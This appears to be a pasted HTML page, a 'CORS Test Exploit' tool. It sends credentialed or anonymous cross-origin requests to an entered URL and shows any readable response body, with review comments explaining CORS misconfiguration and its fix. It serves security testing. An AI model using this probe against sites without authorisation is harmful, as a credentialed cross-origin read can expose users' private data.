
Untitled

a guest
Feb 20th, 2019
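  <!doctype html>
  <html lang="en">
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>CORS Test Exploit</title>
    <!--
      Review notes on page resources:
      * The stylesheet below comes from a third-party origin and is not pinned.
        Self-host it, or add integrity and crossorigin attributes once the hash
        of the trusted file has been computed.
      * No favicon is hot-linked from another organisation's site: doing so
        leaks the page URL in the Referer header and misrepresents who
        published the page.
    -->
    <link rel="stylesheet" href="https://bootswatch.com/4/lumen/bootstrap.css" media="screen">
  </head>
  <body>
    <main class="container mt-4">
      <div class="col-md-6 border mx-auto p-4">
        <h1 class="h3 text-center">CORS Test Exploit</h1>

        <!--
          The inputs carry no keypress filters. The earlier filter deleted every
          non-digit as soon as the value contained the word "document", which
          corrupted ordinary URLs such as /documents/1 and gave no protection.
          Output encoding in renderResult() is what keeps the page safe.
        -->
        <div class="form-group">
          <label for="target">URL:</label>
          <input class="form-control" id="target" name="target" type="url" size="70" autocomplete="off">
        </div>
        <div class="form-group">
          <label for="postdata">Post Data:</label>
          <input class="form-control" id="postdata" name="postdata" type="text" size="70" autocomplete="off">
        </div>

        <!-- To switch between GET and POST, change the handler bound at the end of the script. -->
        <button class="btn btn-info" id="run" type="button">Exploit Now!</button>

        <div class="mt-4" id="result" aria-live="polite"></div>
      </div>
    </main>

    <script>
      "use strict";

      /*
       * What the verdict means.
       * The page sends a cross-origin XMLHttpRequest and reports whether the
       * browser exposed the response to this page's script. A status of 0 is
       * what XMLHttpRequest reports when the CORS check (or the network) fails.
       * Any other status means the response was readable from this origin,
       * whatever the HTTP code was.
       *
       * A readable response is only a finding when the request carried the
       * user's credentials and the data is not meant to be public. The usual
       * server-side cause is reflecting the request's Origin header into
       * Access-Control-Allow-Origin together with
       * Access-Control-Allow-Credentials: true; the fix is an explicit
       * allow-list of trusted origins.
       */

      /**
       * Parse the target field.
       * @param {string} raw  Value typed by the tester.
       * @returns {URL|null}  Parsed URL, or null unless it is absolute http(s).
       */
      function parseTarget(raw) {
        var parsed;
        try {
          parsed = new URL(raw.trim());
        } catch (err) {
          return null;
        }
        if (parsed.protocol !== "http:" && parsed.protocol !== "https:") {
          return null;
        }
        return parsed;
      }

      /** Append a text node to `parent`; the text is never parsed as HTML. */
      function appendText(parent, text) {
        parent.appendChild(document.createTextNode(text));
      }

      /** Append a <kbd> element holding `text` as plain text. */
      function appendKbd(parent, text) {
        var kbd = document.createElement("kbd");
        kbd.textContent = String(text);
        parent.appendChild(kbd);
      }

      /** Replace the result area with a single plain-text message. */
      function renderMessage(text) {
        document.getElementById("result").textContent = text;
      }

      /**
       * Show the outcome of a finished request.
       * The URL and the response body are untrusted, so they are inserted with
       * textContent / value and never through innerHTML. Concatenating them into
       * markup would let a response containing "</textarea>" followed by script
       * run in this page.
       * @param {string} url          Target that was requested.
       * @param {XMLHttpRequest} xhr  Completed request (readyState 4).
       */
      function renderResult(url, xhr) {
        var out = document.getElementById("result");
        out.textContent = "";

        var urlLine = document.createElement("p");
        urlLine.textContent = "URL: " + url;
        out.appendChild(urlLine);

        var verdict = document.createElement("p");
        out.appendChild(verdict);

        if (xhr.status !== 0) {
          appendText(verdict, "Response (Status : ");
          appendKbd(verdict, "VULN");
          appendText(verdict, " | status code : ");
          appendKbd(verdict, xhr.status);
          appendText(verdict, "):");

          var body = document.createElement("textarea");
          body.className = "form-control";
          body.rows = 18;
          body.readOnly = true;
          body.setAttribute("aria-label", "Response body");
          body.value = xhr.responseText;
          out.appendChild(body);
        } else {
          appendText(verdict, "Response (status : ");
          appendKbd(verdict, "Not Vuln");
          appendText(verdict, ") : response tidak ada , status code ");
          appendKbd(verdict, xhr.status);
        }
      }

      /**
       * Send one request to the URL in the target field and render the outcome.
       * @param {string} method            "GET" or "POST".
       * @param {boolean} withCredentials  Value for XMLHttpRequest.withCredentials.
       * @param {string|null} body         Request body, or null for none.
       */
      function sendProbe(method, withCredentials, body) {
        var target = parseTarget(document.getElementsByName("target")[0].value);
        if (!target) {
          renderMessage("Enter an absolute http:// or https:// URL.");
          return;
        }
        // A same-origin request is always readable and says nothing about CORS.
        if (target.origin === window.location.origin) {
          renderMessage("The URL has the same origin as this page, so CORS is not exercised.");
          return;
        }

        var xhttp = new XMLHttpRequest();
        xhttp.onreadystatechange = function () {
          // Report once, when the request is complete. Rendering on every state
          // change printed a negative verdict for the intermediate states.
          if (this.readyState !== 4) {
            return;
          }
          renderResult(target.href, this);
        };
        xhttp.open(method, target.href, true);
        xhttp.withCredentials = withCredentials;
        if (method === "POST") {
          xhttp.setRequestHeader("Content-type", "application/x-www-form-urlencoded");
        }
        xhttp.send(body);
      }

      /** Credentialed GET to the target URL. */
      function get() {
        sendProbe("GET", true, null);
      }

      /**
       * POST of the "Post Data" field to the target URL.
       * NOTE(review): unlike get(), this request is sent without credentials,
       * as in the original. A readable response here therefore only shows that
       * anonymous cross-origin reads are allowed, which is expected for public
       * resources and is not a finding on its own.
       */
      function post() {
        sendProbe("POST", false, document.getElementsByName("postdata")[0].value);
      }

      // Bound here instead of an inline onclick so the page works under a
      // Content-Security-Policy that forbids inline event handlers.
      document.getElementById("run").addEventListener("click", post);
    </script>
  </body>
  </html>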